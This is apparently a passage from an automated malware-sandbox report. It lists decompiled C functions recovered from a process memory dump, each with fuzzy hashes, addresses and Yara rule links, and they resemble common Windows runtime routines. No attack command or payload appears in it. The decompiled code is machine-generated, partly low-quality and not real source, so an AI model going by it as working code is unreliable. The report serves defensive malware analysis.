                                                            • Opcode ID: fb50dda550ec226cf65233915e68951702dbc21242fd8cb4a59c58836d5c4808
                                                            • Instruction ID: a7e8af9f8f97d5fa7d1e5e512c50902d98b167a7a35bc9763bad2ac789f52216
                                                            • Opcode Fuzzy Hash: fb50dda550ec226cf65233915e68951702dbc21242fd8cb4a59c58836d5c4808
                                                            • Instruction Fuzzy Hash: 3B8173796042219FDB15CE94DA80B6B73E9EB84354F1449BEED45AB249E330FD40CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0494B8D0, Relevance: .2, Instructions: 199COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 39%
                                                            			E0494B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x49a7b9c; // 0x0
				_t124 = L048D4620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E048F9800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E048F95B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E048F95D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L048D77F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E048F9910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L048D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E048F95D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x49a7b9c; // 0x0
									_t92 = L048D4620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E048F9910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L048D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E048BA7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E0494E7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E0494E7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E048F95B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}




















                                                            0x0494b8d9
                                                            0x0494b8e4
                                                            0x00000000
                                                            0x0494b8e6
                                                            0x0494b8f3
                                                            0x0494b8f5
                                                            0x0494b8f5
                                                            0x0494b8f8
                                                            0x0494b920
                                                            0x0494b924
                                                            0x0494b936
                                                            0x0494b939
                                                            0x0494b93d
                                                            0x0494b948
                                                            0x0494b9a0
                                                            0x0494b9a0
                                                            0x0494b9a4
                                                            0x0494b9bf
                                                            0x0494b9c4
                                                            0x0494b9c6
                                                            0x0494b9cd
                                                            0x0494b9d1
                                                            0x0494bad4
                                                            0x0494bad8
                                                            0x0494bada
                                                            0x0494badc
                                                            0x0494badc
                                                            0x0494badf
                                                            0x0494bae0
                                                            0x0494bae2
                                                            0x0494bae4
                                                            0x0494baec
                                                            0x0494baee
                                                            0x0494baf0
                                                            0x0494baf0
                                                            0x0494baec
                                                            0x0494bafb
                                                            0x0494bafc
                                                            0x0494bafe
                                                            0x0494bb01
                                                            0x0494bb01
                                                            0x00000000
                                                            0x0494bb06
                                                            0x0494b9d7
                                                            0x0494b9db
                                                            0x0494b9db
                                                            0x0494b9de
                                                            0x0494b9de
                                                            0x0494b9e4
                                                            0x0494b9e7
                                                            0x0494b9ea
                                                            0x0494b9ec
                                                            0x0494b9ef
                                                            0x0494b9f3
                                                            0x0494ba1b
                                                            0x0494ba1b
                                                            0x0494ba23
                                                            0x0494ba24
                                                            0x0494ba27
                                                            0x0494ba2a
                                                            0x0494ba2b
                                                            0x0494ba2e
                                                            0x0494ba30
                                                            0x0494ba37
                                                            0x0494ba3f
                                                            0x0494ba9c
                                                            0x0494baa2
                                                            0x0494bb13
                                                            0x0494bb15
                                                            0x0494baae
                                                            0x0494baae
                                                            0x0494bab3
                                                            0x0494bab5
                                                            0x0494baba
                                                            0x0494bac8
                                                            0x0494bac8
                                                            0x0494baba
                                                            0x0494bacd
                                                            0x0494bacf
                                                            0x00000000
                                                            0x0494bacf
                                                            0x0494bb1a
                                                            0x00000000
                                                            0x0494bb1c
                                                            0x0494baa7
                                                            0x0494bb11
                                                            0x00000000
                                                            0x0494bb11
                                                            0x0494baa9
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0494ba41
                                                            0x0494ba41
                                                            0x0494ba41
                                                            0x0494ba58
                                                            0x0494ba5d
                                                            0x0494ba62
                                                            0x00000000
                                                            0x00000000
                                                            0x0494ba64
                                                            0x0494ba67
                                                            0x0494ba68
                                                            0x0494ba69
                                                            0x0494ba6c
                                                            0x0494ba6f
                                                            0x0494ba71
                                                            0x0494ba78
                                                            0x0494ba80
                                                            0x00000000
                                                            0x00000000
                                                            0x0494ba90
                                                            0x0494ba90
                                                            0x0494ba97
                                                            0x00000000
                                                            0x0494ba97
                                                            0x0494b9f5
                                                            0x0494b9f7
                                                            0x0494b9f7
                                                            0x0494b9fa
                                                            0x0494ba03
                                                            0x0494ba07
                                                            0x0494ba0c
                                                            0x0494ba10
                                                            0x0494ba17
                                                            0x00000000
                                                            0x0494b9f7
                                                            0x0494b9a6
                                                            0x0494b9a8
                                                            0x0494b9af
                                                            0x0494b9b3
                                                            0x00000000
                                                            0x00000000
                                                            0x0494b9b9
                                                            0x00000000
                                                            0x0494b9b9
                                                            0x0494b94d
                                                            0x0494b98f
                                                            0x0494b995
                                                            0x0494b999
                                                            0x0494b960
                                                            0x0494b967
                                                            0x0494b968
                                                            0x0494b96a
                                                            0x00000000
                                                            0x0494b96a
                                                            0x0494b99b
                                                            0x0494b99e
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0494b99e
                                                            0x0494b951
                                                            0x0494b954
                                                            0x0494b95a
                                                            0x0494b95e
                                                            0x0494b972
                                                            0x0494b979
                                                            0x0494b97d
                                                            0x0494b97f
                                                            0x0494b980
                                                            0x0494b982
                                                            0x0494b984
                                                            0x00000000
                                                            0x0494b984
                                                            0x00000000
                                                            0x0494b926
                                                            0x00000000
                                                            0x0494b926

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 715e3d4e5e3a9721f894140531d3a9d7ee3481fc1efeb2cdc2af56c9927cf67f
                                                            • Instruction ID: 7ba93023ec481dd6020190b729f2cdcf802fbd12072b540212b6799e95721cec
                                                            • Opcode Fuzzy Hash: 715e3d4e5e3a9721f894140531d3a9d7ee3481fc1efeb2cdc2af56c9927cf67f
                                                            • Instruction Fuzzy Hash: 2B710272200705AFE7318F58CC44F66B7E9EB84728F144A38E655876E0EBB4F944DB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048B52A5, Relevance: .2, Instructions: 161COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 80%
                                                            			E048B52A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E048CEEF0(0x49a79a0);
					_t104 =  *0x49a8210; // 0x371ea0
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					_t2 = _t104 + 8; // 0x28000000
					 *((intOrPtr*)(_t108 + 0x18)) =  *_t2;
					E048CEB70(_t93, 0x49a79a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_t10 = _t104 + 4; // 0x0
							_push( *_t10);
							_t53 = E048F9890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E048CEEF0(0x49a79a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E048CEB70(0, 0x49a79a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t11 = _t104 + 0xe; // 0x371eb802
								_t13 = _t104 + 0xc; // 0x371ead
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E048EF0BF(_t13,  *_t11 & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E048CEEF0(0x49a79a0);
									__eflags =  *0x49a8210 - _t104; // 0x371ea0
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x49a8210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t37 = _t104 + 0x10; // 0x2000371e
											_t95 =  *((intOrPtr*)( *_t37));
											E04934888(_t89,  *((intOrPtr*)( *_t37)), __eflags);
										}
										E048CEB70(_t95, 0x49a79a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_t38 = _t104 + 4; // 0x0
											_push( *_t38);
											E048F95D0();
											L048D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_t41 = _t104 + 4; // 0x0
											_push( *_t41);
											E048F95D0();
											L048D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E048CEB70(_t93, 0x49a79a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_t25 = _t104 + 4; // 0x0
										_push( *_t25);
										E048F95D0();
										L048D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E048F95D0();
										L048D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t15 = _t104 + 0x10; // 0x2000371e
								_t93 =  &_v20;
								_t17 = _t104 + 0xe; // 0x371eb802
								 *((intOrPtr*)(_t108 + 0x20)) =  *_t15;
								_t85 = 6;
								_v20 = _t85;
								_t87 = E048EF0BF( &_v20,  *_t17 & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

























                                                            0x048b52a5
                                                            0x048b52ad
                                                            0x048b52b0
                                                            0x048b52b3
                                                            0x048b52b7
                                                            0x048b52ba
                                                            0x048b52bf
                                                            0x048b52c4
                                                            0x048b52cc
                                                            0x00000000
                                                            0x00000000
                                                            0x048b52ce
                                                            0x048b52d1
                                                            0x048b52d9
                                                            0x048b52dd
                                                            0x048b52e7
                                                            0x048b52f7
                                                            0x048b52f9
                                                            0x048b52fd
                                                            0x04910dcf
                                                            0x04910dd5
                                                            0x04910dd6
                                                            0x04910dd7
                                                            0x04910dd8
                                                            0x04910dd9
                                                            0x04910dde
                                                            0x04910ddf
                                                            0x04910de0
                                                            0x04910de1
                                                            0x04910de2
                                                            0x04910de2
                                                            0x04910de5
                                                            0x04910dea
                                                            0x04910dec
                                                            0x04910f60
                                                            0x04910f64
                                                            0x04910f70
                                                            0x04910f76
                                                            0x04910f79
                                                            0x04910f79
                                                            0x00000000
                                                            0x04910f64
                                                            0x04910df2
                                                            0x04910df7
                                                            0x04910e04
                                                            0x04910e04
                                                            0x04910e0d
                                                            0x04910e0d
                                                            0x04910e10
                                                            0x04910e1a
                                                            0x04910e1c
                                                            0x04910e4c
                                                            0x04910e52
                                                            0x04910e61
                                                            0x04910e67
                                                            0x04910e6b
                                                            0x04910e70
                                                            0x04910e76
                                                            0x04910ed7
                                                            0x04910edc
                                                            0x04910ee0
                                                            0x04910ee6
                                                            0x04910eea
                                                            0x04910eed
                                                            0x04910ef0
                                                            0x04910ef3
                                                            0x04910ef6
                                                            0x04910ef9
                                                            0x04910efb
                                                            0x04910efe
                                                            0x04910f01
                                                            0x04910f01
                                                            0x04910f0b
                                                            0x04910f12
                                                            0x04910f16
                                                            0x04910f18
                                                            0x04910f18
                                                            0x04910f1b
                                                            0x04910f2c
                                                            0x04910f31
                                                            0x04910f31
                                                            0x04910f35
                                                            0x04910f39
                                                            0x04910f3a
                                                            0x04910f3c
                                                            0x04910f3c
                                                            0x04910f3f
                                                            0x04910f50
                                                            0x04910f55
                                                            0x04910f55
                                                            0x04910f59
                                                            0x048b52eb
                                                            0x048b52f1
                                                            0x048b52f1
                                                            0x04910e7d
                                                            0x04910e84
                                                            0x04910e88
                                                            0x04910e8a
                                                            0x04910e8a
                                                            0x04910e8d
                                                            0x04910e9e
                                                            0x04910ea3
                                                            0x04910ea3
                                                            0x04910ea7
                                                            0x04910eaf
                                                            0x04910eb3
                                                            0x04910eb9
                                                            0x04910eb9
                                                            0x04910ebc
                                                            0x04910ecd
                                                            0x04910ecd
                                                            0x00000000
                                                            0x04910eb3
                                                            0x04910e1e
                                                            0x04910e21
                                                            0x04910e25
                                                            0x04910e2b
                                                            0x04910e2f
                                                            0x04910e30
                                                            0x04910e3a
                                                            0x04910e3f
                                                            0x04910e41
                                                            0x00000000
                                                            0x00000000
                                                            0x04910e47
                                                            0x00000000
                                                            0x04910e47
                                                            0x04910df9
                                                            0x04910dfe
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x04910dfe
                                                            0x048b5303
                                                            0x048b5307
                                                            0x00000000
                                                            0x048b5309
                                                            0x00000000
                                                            0x048b5309
                                                            0x048b5307
                                                            0x048b52e9
                                                            0x048b52e9
                                                            0x00000000
                                                            0x048b52e9
                                                            0x048b530e
                                                            0x00000000

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 46b79ea46c6d1d3f46d97a1e23644e1720092922fa867de78f14333e6c1dc246
                                                            • Instruction ID: 9c6de4fd0735c3fe0913799f6cddadf847acb1ee27076e25fb50bf65526cf38c
                                                            • Opcode Fuzzy Hash: 46b79ea46c6d1d3f46d97a1e23644e1720092922fa867de78f14333e6c1dc246
                                                            • Instruction Fuzzy Hash: 7051BD70245345AFE721DF68C841B66BBA4FF84718F140E2EE595C7650E7B0F844CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048CEF40, Relevance: .1, Instructions: 147COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 96%
                                                            			E048CEF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E048B9080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x770bc21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E048B2D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}




























                                                            0x048cef4b
                                                            0x048cef4d
                                                            0x048cef57
                                                            0x048cf0bd
                                                            0x048cf0c2
                                                            0x048cf0d2
                                                            0x048cf0d2
                                                            0x048cf0c2
                                                            0x048cef5d
                                                            0x048cef5f
                                                            0x048cef67
                                                            0x048cef6a
                                                            0x048cef6d
                                                            0x048cef74
                                                            0x048cef7f
                                                            0x048cef82
                                                            0x048cef82
                                                            0x048cef86
                                                            0x048cef88
                                                            0x048cef8c
                                                            0x048cef8f
                                                            0x048cef8f
                                                            0x048cef8f
                                                            0x00000000
                                                            0x048cef91
                                                            0x048cef93
                                                            0x048cefc4
                                                            0x048cefc4
                                                            0x048cefc4
                                                            0x048cefca
                                                            0x048cefd0
                                                            0x048cf0a6
                                                            0x00000000
                                                            0x00000000
                                                            0x048cf0af
                                                            0x0491bb06
                                                            0x0491bb0a
                                                            0x048cf0b5
                                                            0x048cf0b5
                                                            0x048cf0b5
                                                            0x048cf0b5
                                                            0x00000000
                                                            0x048cefd6
                                                            0x048cefd9
                                                            0x048cf0de
                                                            0x048cf0e2
                                                            0x048cefdf
                                                            0x048cefdf
                                                            0x048cefdf
                                                            0x048cefe5
                                                            0x0491bafc
                                                            0x0491bafc
                                                            0x048cefe5
                                                            0x048cefeb
                                                            0x048cefed
                                                            0x048cf00f
                                                            0x048cf011
                                                            0x048cf01a
                                                            0x048cf01d
                                                            0x048cf021
                                                            0x048cf028
                                                            0x048cf029
                                                            0x048cf029
                                                            0x048cf02c
                                                            0x00000000
                                                            0x048cf02c
                                                            0x048ceff3
                                                            0x048ceff9
                                                            0x048cf0ea
                                                            0x048cf0ed
                                                            0x048cf0ef
                                                            0x00000000
                                                            0x048cf0ef
                                                            0x048cf003
                                                            0x0491bb12
                                                            0x048cf045
                                                            0x048cf049
                                                            0x048cf051
                                                            0x048cf09e
                                                            0x048cf0a0
                                                            0x048cf0a0
                                                            0x048cf09e
                                                            0x048cf053
                                                            0x048cf064
                                                            0x048cf064
                                                            0x048cf06b
                                                            0x0491bb1a
                                                            0x0491bb1a
                                                            0x048cf071
                                                            0x048cf071
                                                            0x048cf07d
                                                            0x048cf082
                                                            0x048cf08f
                                                            0x048cf08f
                                                            0x048cf009
                                                            0x048cf00d
                                                            0x00000000
                                                            0x048cf00d
                                                            0x048cefd0
                                                            0x048cef97
                                                            0x048cefa5
                                                            0x048cefaa
                                                            0x00000000
                                                            0x048cefac
                                                            0x048cefac
                                                            0x048cefac
                                                            0x00000000
                                                            0x048cefb2
                                                            0x048cf036
                                                            0x048cf03a
                                                            0x048cf040
                                                            0x048cf090
                                                            0x00000000
                                                            0x048cf092
                                                            0x048cf042
                                                            0x00000000
                                                            0x048cf042
                                                            0x048cefb7
                                                            0x048cefb9
                                                            0x048cefbc
                                                            0x048cefb0
                                                            0x048cefb0
                                                            0x00000000
                                                            0x048cefbe
                                                            0x048cefbe
                                                            0x048cefc1
                                                            0x00000000
                                                            0x048cefc1
                                                            0x048cefbc
                                                            0x048cefaa
                                                            0x048cef91

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                            • Instruction ID: 320e0bb7cf6d1b3d0cfd07aab0ba4012db2e528dcf857f27918510ab7ca59004
                                                            • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                            • Instruction Fuzzy Hash: 3451E330A04249DFEB24CF68C190BAEBBB2AF05318F1886ADDB45D7281D375F989D751
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0498740D, Relevance: .1, Instructions: 141COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 84%
                                                            			E0498740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E0490D4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E048FF380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L048D4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
